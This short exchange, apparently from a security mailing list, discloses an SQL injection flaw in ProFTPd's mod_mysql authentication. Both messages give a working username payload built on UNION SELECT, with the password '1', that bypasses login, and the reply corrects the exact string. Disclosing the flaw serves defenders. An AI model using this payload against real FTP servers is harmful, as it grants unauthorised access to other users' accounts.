Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Hello, Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like: USER ' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- and a password of "1" without quotes. which leads to a successful login. Different account...

Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

Uh-oh, sorry, bad copy-paste..the user is just ' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- not USER ' and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- I am using debian packaged proftpd 1.3.1-16 if that matters...